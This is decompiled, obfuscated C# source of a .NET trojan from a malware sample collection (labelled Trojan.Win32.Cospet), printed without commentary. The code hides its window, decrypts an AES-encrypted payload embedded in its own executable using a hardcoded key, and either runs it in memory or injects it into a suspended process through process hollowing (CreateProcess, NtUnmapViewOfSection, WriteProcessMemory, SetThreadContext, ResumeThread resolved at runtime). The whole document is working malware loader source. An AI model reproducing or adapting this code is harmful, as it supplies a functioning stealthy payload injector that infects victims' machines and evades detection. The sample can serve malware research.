// Decompiled with JetBrains decompiler // Type: Yi0GE2NLaKY9cPmB45.l1YmlpPMvQyqqZeffw // Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 7876418B-9B45-4205-B20B-41AA64972C85 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe using lIMo5cXu7QVSJ7hdyJ; using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using System; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.IO; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using System.Threading; using System.Windows.Forms; using TmwCXiWu118CwLLcBx; namespace Yi0GE2NLaKY9cPmB45 { [DesignerGenerated] internal class l1YmlpPMvQyqqZeffw : Form { private IContainer u0ejtRg5C; private const string SXcEpLecu = "ᅕჯᅀᅕᄱᆲᆂᄐᅘᅕᆂၺᄷᅉᄢᄮᄽᆝᆲᆯᄄᆋᅿᇍᄊᄮჾᇊᅭᅘეၓᇷᆠᆋᆈᄁᆗრᅒᆻᅃᇐᆝᆗሆᇟᅿᆗဗᇱეᆻᇄሃᄥᇨᅉᇨᄢ̏Ϫ"; [MethodImpl(MethodImplOptions.NoInlining)] public l1YmlpPMvQyqqZeffw() { qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR(); // ISSUE: explicit constructor call base.\u002Ector(); this.Load += new EventHandler(this.ORG997Eyt); this.u1SVD5csY(); } [DebuggerNonUserCode] [MethodImpl(MethodImplOptions.NoInlining)] protected override void Dispose([In] bool obj0) { try { if (!obj0 || this.u0ejtRg5C == null) return; this.u0ejtRg5C.Dispose(); } finally { base.Dispose(obj0); } } [DebuggerStepThrough] [MethodImpl(MethodImplOptions.NoInlining)] private void u1SVD5csY() { this.SuspendLayout(); this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; this.ClientSize = new Size(10, 10); this.FormBorderStyle = FormBorderStyle.None; this.Name = tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(190); this.Opacity = 0.0; this.ShowIcon = false; this.ShowInTaskbar = false; this.WindowState = FormWindowState.Minimized; this.ResumeLayout(false); } [MethodImpl(MethodImplOptions.NoInlining)] private void rSSBpBKPm([In] byte[] obj0) { Assembly assembly = Assembly.Load(obj0); MethodInfo entryPoint = assembly.EntryPoint; object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)))); entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1] { (object) new string[1] { tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(204) } }); } [MethodImpl(MethodImplOptions.NoInlining)] private void ORG997Eyt([In] object obj0_1, [In] EventArgs obj1) { string[] strArray = Strings.Split(File.ReadAllText(Application.ExecutablePath), tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(210)); byte[] parameter = this.li87Z8Ac6(Convert.FromBase64String(strArray[1])); Encoding.GetEncoding(1252).GetBytes(strArray[1]); if (Conversions.ToBoolean(strArray[2])) { Thread thread = new Thread((ParameterizedThreadStart) (obj0_2 => this.rSSBpBKPm((byte[]) obj0_2))); thread.TrySetApartmentState(ApartmentState.STA); thread.Start((object) parameter); } else this.lElT0QhP0(parameter, tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(338)); } [DllImport("kernel32", EntryPoint = "LoadLibraryA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr \u0036jCbOnaNR([MarshalAs(UnmanagedType.VBByRefStr)] ref string _param0); [DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr pp7vagxki([In] IntPtr obj0, [MarshalAs(UnmanagedType.VBByRefStr)] ref string _param1); [MethodImpl(MethodImplOptions.NoInlining)] public T w62GtbsBB([In] string obj0, [In] string obj1) => (T) Marshal.GetDelegateForFunctionPointer(l1YmlpPMvQyqqZeffw.pp7vagxki(l1YmlpPMvQyqqZeffw.\u0036jCbOnaNR(ref obj0), ref obj1), typeof (T)); [MethodImpl(MethodImplOptions.NoInlining)] public bool lElT0QhP0([In] byte[] obj0, [In] string obj1) { l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ obj2 = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(448))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(476)))); l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv r9hFs0ZthQaZ334oHv = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(520))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(548)))); l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX dr45xqt8vapkmdO5jX = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(600))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(628)))); l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm zfvhinbtZbMtI7F6cm = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(680))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(708)))); l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy k3lty9wFb990IxNy = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(752))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(780)))); l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD eqihWru9Nn70v7Fbd = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(832))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(860)))); l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT ayi64li1PrjMwO41Zt = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(912))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(940)))); l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg obj3 = this.w62GtbsBB(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(976))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(996)))); bool flag; try { IntPtr zero1 = IntPtr.Zero; IntPtr[] numArray1 = new IntPtr[4]; byte[] numArray2 = new byte[68]; int int32_1 = BitConverter.ToInt32(obj0, 60); int int16 = (int) BitConverter.ToInt16(obj0, checked (int32_1 + 6)); IntPtr num1 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 84))); if (obj2((string) null, new StringBuilder(obj1), zero1, zero1, false, 4, zero1, (string) null, numArray2, numArray1)) { uint[] numArray3 = new uint[179]; numArray3[0] = 65538U; if (r9hFs0ZthQaZ334oHv(numArray1[1], numArray3)) { IntPtr num2 = new IntPtr(checked ((long) numArray3[41] + 8L)); IntPtr zero2 = IntPtr.Zero; IntPtr num3 = new IntPtr(4); IntPtr zero3 = IntPtr.Zero; if (dr45xqt8vapkmdO5jX(numArray1[0], num2, ref zero2, (int) num3, ref zero3) && obj3(numArray1[0], zero2) == 0U) { IntPtr num4 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 52))); IntPtr num5 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 80))); IntPtr num6 = zfvhinbtZbMtI7F6cm(numArray1[0], num4, num5, 12288, 64); int int32_2 = num6.ToInt32(); int num7; int num8 = k3lty9wFb990IxNy(numArray1[0], num6, obj0, checked ((uint) (int) num1), num7) ? 1 : 0; int num9 = checked (int16 - 1); int num10 = 0; while (num10 <= num9) { int[] dst1 = new int[10]; Buffer.BlockCopy((Array) obj0, checked (int32_1 + 248 + num10 * 40), (Array) dst1, 0, 40); byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)]; Buffer.BlockCopy((Array) obj0, dst1[5], (Array) dst2, 0, dst2.Length); num5 = new IntPtr(checked (int32_2 + dst1[3])); num4 = new IntPtr(dst2.Length); int num11 = k3lty9wFb990IxNy(numArray1[0], num5, dst2, checked ((uint) (int) num4), num7) ? 1 : 0; checked { ++num10; } } num5 = new IntPtr(checked ((long) numArray3[41] + 8L)); num4 = new IntPtr(4); int num12 = k3lty9wFb990IxNy(numArray1[0], num5, BitConverter.GetBytes(num6.ToInt32()), checked ((uint) (int) num4), num7) ? 1 : 0; numArray3[44] = checked ((uint) (num6.ToInt32() + BitConverter.ToInt32(obj0, int32_1 + 40))); int num13 = eqihWru9Nn70v7Fbd(numArray1[1], numArray3) ? 1 : 0; } } int num14 = (int) ayi64li1PrjMwO41Zt(numArray1[1]); } } catch (Exception ex) { ProjectData.SetProjectError(ex); flag = false; ProjectData.ClearProjectError(); goto label_11; } flag = true; label_11: return flag; } [MethodImpl(MethodImplOptions.NoInlining)] public byte[] li87Z8Ac6([In] byte[] obj0) { using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) { rijndaelManaged.IV = new byte[16] { (byte) 1, (byte) 2, (byte) 3, (byte) 4, (byte) 5, (byte) 6, (byte) 7, (byte) 8, (byte) 9, (byte) 1, (byte) 2, (byte) 3, (byte) 4, (byte) 5, (byte) 6, (byte) 7 }; rijndaelManaged.Key = new byte[16] { (byte) 7, (byte) 6, (byte) 5, (byte) 4, (byte) 3, (byte) 2, (byte) 1, (byte) 9, (byte) 8, (byte) 7, (byte) 6, (byte) 5, (byte) 4, (byte) 3, (byte) 2, (byte) 1 }; return rijndaelManaged.CreateDecryptor().TransformFinalBlock(obj0, 0, obj0.Length); } } [return: MarshalAs(UnmanagedType.Bool)] public delegate bool \u0039klfPRdkUkcORZqXqJ( [In] string obj0, [In] StringBuilder obj1, [In] IntPtr obj2, [In] IntPtr obj3, [MarshalAs(UnmanagedType.Bool)] bool _param5, [In] int obj5, [In] IntPtr obj6, [In] string obj7, [In] byte[] obj8, [In] IntPtr[] obj9); public delegate bool qgK3lty9wFb990IxNy( [In] IntPtr obj0, [In] IntPtr obj1, [In] byte[] obj2, [In] uint obj3, [In] int obj4); [return: MarshalAs(UnmanagedType.Bool)] public delegate bool DR45xqt8vapkmdO5jX( [In] IntPtr obj0, [In] IntPtr obj1, [In] ref IntPtr obj2, [In] int obj3, [In] ref IntPtr obj4); public delegate IntPtr ZfvhinbtZbMtI7F6cm( [In] IntPtr obj0, [In] IntPtr obj1, [In] IntPtr obj2, [In] int obj3, [In] int obj4); public delegate uint \u00331cnlp5hhg963mPuNg([In] IntPtr obj0, [In] IntPtr obj1); public delegate uint Ayi64li1PRJMwO41ZT([In] IntPtr obj0); [return: MarshalAs(UnmanagedType.Bool)] public delegate bool r9hFs0ZTHQaZ334oHv([In] IntPtr obj0, [In] uint[] obj1); [return: MarshalAs(UnmanagedType.Bool)] public delegate bool hEqihWru9Nn70v7FBD([In] IntPtr obj0, [In] uint[] obj1); } }